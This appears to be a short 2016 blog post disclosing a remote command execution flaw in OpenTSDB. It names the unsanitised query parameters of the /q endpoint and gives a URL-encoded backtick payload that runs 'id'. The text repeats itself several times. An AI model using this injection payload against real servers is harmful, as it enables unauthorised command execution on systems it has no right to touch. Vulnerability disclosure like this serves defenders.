See example url:
http://opentsdb.com:4242/q?
Results in RCE unfortunately
More parameters:
wxh
start
m
o
key
style
Payload:
%60id%60
Affects all current versions of opentsdb.
2016 m. balandžio 25 d., pirmadienis
OpenTSDB RCE
The paramenter wxh needs some sanitation before being used by opentsdb.
See example url:
http://opentsdb.com:4242/q?
Results in RCE unfortunately
More parameters:
wxh
start
m
o
key
style
Payload:
%60id%60
Affects all current versions of opentsdb.
See example url:
http://opentsdb.com:4242/q?
Results in RCE unfortunately
More parameters:
wxh
start
m
o
key
style
Payload:
%60id%60
Affects all current versions of opentsdb.
Užsisakykite:
Rašyti komentarus (Atom)
Komentarų nėra:
Rašyti komentarą